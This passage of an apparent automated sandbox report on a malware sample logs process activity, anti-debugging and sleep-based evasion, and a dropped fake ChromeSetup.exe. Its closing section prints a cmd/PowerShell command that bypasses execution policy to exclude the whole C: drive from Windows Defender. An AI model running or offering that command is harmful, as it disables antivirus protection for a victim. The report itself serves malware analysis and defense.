                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6610Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3114Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeWindow / User API: threadDelayed 1573Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeWindow / User API: threadDelayed 3541Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeWindow / User API: threadDelayed 3890Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4860Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1599Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6596Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3162Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4017
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2296
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-10755
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeDropped PE file which has not been started: C:\Users\user\Downloads\ChromeSetup.exeJump to dropped file
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ChromeSetup[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_6-48830
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_6-48829
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep count: 6610 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep count: 3114 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe TID: 1664Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe TID: 7560Thread sleep count: 307 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe TID: 2604Thread sleep count: 1573 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe TID: 2604Thread sleep time: -1573000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe TID: 936Thread sleep count: 3541 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe TID: 936Thread sleep time: -35410s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe TID: 2604Thread sleep count: 3890 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe TID: 2604Thread sleep time: -3890000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028Thread sleep count: 4860 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028Thread sleep count: 1599 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep count: 6596 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep count: 3162 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7284Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep count: 4017 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep count: 2296 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep count: 217 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeThread sleep count: Count: 3541 delay: -10Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D080F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,6_2_02D080F0
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D07410 GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,6_2_02D07410
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.000000000099E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0R
                      Source: powershell.exe, 0000000D.00000002.1420200807.0000000004776000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: powershell.exe, 0000000D.00000002.1420200807.0000000004776000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: powershell.exe, 0000000D.00000002.1420200807.0000000004776000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: FIWszl1A8l.exe, 00000006.00000002.3783680382.00000000009BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeAPI call chain: ExitProcess graph end nodegraph_6-48418
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_10016A5E IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10016A5E
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D1054D VirtualProtect ?,-00000001,00000104,?6_2_02D1054D
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D07490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,6_2_02D07490
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_008D0AE4 mov eax, dword ptr fs:[00000030h]0_2_008D0AE4
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_3_03FA49C9 mov eax, dword ptr fs:[00000030h]6_3_03FA49C9
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_00920AE4 mov eax, dword ptr fs:[00000030h]6_2_00920AE4
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_028200CD mov eax, dword ptr fs:[00000030h]6_2_028200CD
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D06790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,6_2_02D06790
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_10016D55 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10016D55
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_10016A5E IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10016A5E
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_008E6D2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_008E6D2C
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_008E6A35 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008E6A35
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,6_2_02D0DF10
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_02D0F00A
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D11F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_02D11F67
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_00976815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00976815
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_00978587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00978587

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                      Bypasses PowerShell execution policy
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Contains functionality to inject code into remote processes
